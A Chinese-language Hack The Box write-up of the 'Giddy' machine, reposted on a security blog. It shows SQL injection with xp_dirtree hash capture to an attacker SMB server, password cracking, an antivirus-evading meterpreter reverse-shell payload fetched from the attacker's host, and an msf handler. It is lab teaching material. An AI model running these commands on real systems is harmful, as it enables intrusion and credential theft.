子比主题,更优雅的Wordpress主题
更优雅的WordPress网站主题:子比主题!全面开启

HTB:Giddy渗透测试 – 作者:WAFmax

0110

基础信息

简介:Hack The Box是一个在线渗透测试平台。可以帮助你提升渗透测试技能和黑盒测试技能,平台环境都是模拟的真实环境,有助于自己更好的适应在真实环境的渗透。
链接:https://www.hackthebox.eu/home/machines/profile/153
描述:图片.png

前言

本次演练使用kali系统按照渗透测试的过程进行操作,在渗透前期通过信息收集获取到相应的目录,发现存在SQL注入,知道了使用了mssql数据库,通过xp_dirtree函数获取hash,获取到账号与密码最终通过提权获取到root权限。

一、信息收集

1、靶机ip

IP地址为:10.10.10.104
图片.png

2、靶机端口与服务
nmap -sT -sV -O -A 10.10.10.104

图片.png

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
2、网站信息收集

(1)查看80端口与443端口收集网站信息
发现都是同一张图片
图片.png
图片.png
将图片拷贝下来使用steghide查看是否存在隐写

steghide extract -sf giddy.jpg

该图片不存在隐写
图片.png(2)目录扫描

python3 dirsearch.py  -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.104/

这里只列出了对本次渗透有用的目录
图片.png

/mvc 
/remote

二、漏洞探测与利用

1、SQL注入

访问/mvc目录
这是一个商品列表点击之后会显示价格
图片.png
看见这个url感觉可能存在SQL注入加一个’测试一下
图片.png报错使用sqlmap跑一下看看能否获取一些信息
图片.png通过sqlmap扫描得知使用的是mssql数据库已知该数据库存在堆叠注入,并且该数据库正在以DBMS运行着
图片.png可以使用 impacket-smbserver,通过xpdirtree函数连接到该服务获取到相应的哈希,最后使用john破解hash

impacket-smbserver xb $(pwd)
;exec xp_dirtree '\\10.10.14.8\xb';--
john --wordlist /usr/share/wordlists/rockyou.txt hash

图片.png图片.png用户:GIDDY\Stacy
密码:xNnWo6272k7x

2、获取shell

查看/remote目录,这是一个登陆界面,可以使用获取到的密码账号尝试登陆,但是提示说我们是需要使用https进行登录
图片.png更换到https进行登录
图片.png

三、提权

1、获取user.txt

登录之后发现这是一个powershell窗口可以运行命令
获取user.txt
图片.png

2、提权

通过信息收集得知系统运行了unifivideo服务
图片.png通过谷歌得知这是一个视频监控服务
图片.png使用searchsploit查询可利用脚本
图片.png通过叙述可知在关闭开启该服务的时候会访问taskkill.exe,可以创建一个taskkill.exe上传到该目录下,反弹shell
图片.png由于存在防病毒模块我们需要对给模块进行绕过,使用[Phantom-Evasion](https://github.com/oddcod3/Phantom-Evasion)进行生成,这是一个个人感觉不错的工具
注:之前上传的被杀掉这里直接演示成功绕过的

python3 phantom-evasion.py -m WSI -msfp windows/meterpreter/reverse_tcp -H 10.10.14.8 -P 4444 -i Thread -e 4 -mem Virtual_RWX -j 1 -J 15 -jr 0 -E 5 -c www.windows.com:443 -f exe -o taskkill.exe

图片.png本地开放8001端口,让taskkill.exe上传到靶机中

python3 -m http.server 8001
Invoke-WebRequest -o taskkill.exe http://10.10.14.8:8001/taskkill.exe

一切准备就绪,使用msf监听端口
图片.png

use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp 
set LHOST 10.10.14.8
exploit

关闭开启Ubiquiti UniFi Video服务

Stop-Service "Ubiquiti UniFi Video"
start-service unifivideoservice

成功获取到shell
图片.png图片.png查看权限发现是系统权限
图片.png

3、获取root.txt

图片.png

来源:freebuf.com 2021-06-10 01:37:37 by: WAFmax

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
安全网站文章
喜欢就支持一下吧
点赞0
分享
相关推荐
安全小百科-GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
GeoServer漏洞利用总结及案例参考 – 作者:vlong6
3年前 2043
安全小百科-Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
Thinkphp v5.1.41反序列化漏洞分析及EXP – 作者:4ut15m
3年前 900
安全小百科-Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
Citrix未授权漏洞cve-2020-8193个人复现 – 作者:AEKiller
3年前 780
安全小百科-『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
『渗透测试』记一次简单的 CMS 漏洞挖掘 – 作者:宸极实验室Sec
3年前 716
评论 抢沙发

请登录后发表评论

搜索
开启精彩搜索
标签云
龟背龚某龙鱼龙马龙首龙车龙身龙芯龙生九子龙火龙海市龙泉驿区龙岩市龙女龙南县龙凤龙伯龍首龍門龍身
公司成功上市啦! - 作者:KOAL格尔国信-安全小百科

公司成功上市啦! – 作者:KOAL格尔国信

admin的头像-安全小百科3年前
049730
Comdev eCommerce 3.0 - 'config.php' Remote File Inclusion-安全小百科

Comdev eCommerce 3.0 – ‘config.php’ Remote File Inclusion

admin的头像-安全小百科3年前
47710
GeoServer漏洞利用总结及案例参考 - 作者:vlong6-安全小百科

GeoServer漏洞利用总结及案例参考 – 作者:vlong6

admin的头像-安全小百科3年前
020430
女祭女戚-安全小百科

女祭女戚

admin的头像-安全小百科3年前
012860
帆软10.0 Getshell漏洞分析-安全小百科

帆软10.0 Getshell漏洞分析

admin的头像-安全小百科3年前
011940
科锐逆向线上班完整版视频2020年 - 作者:hgjhf63fa-安全小百科

科锐逆向线上班完整版视频2020年 – 作者:hgjhf63fa

admin的头像-安全小百科3年前
010510
恐龙抗狼扛的头像-安全小百科

恐龙抗狼扛1年前0

kankan
admin的头像-安全小百科

啊啊啊啊3年前0

66666666666666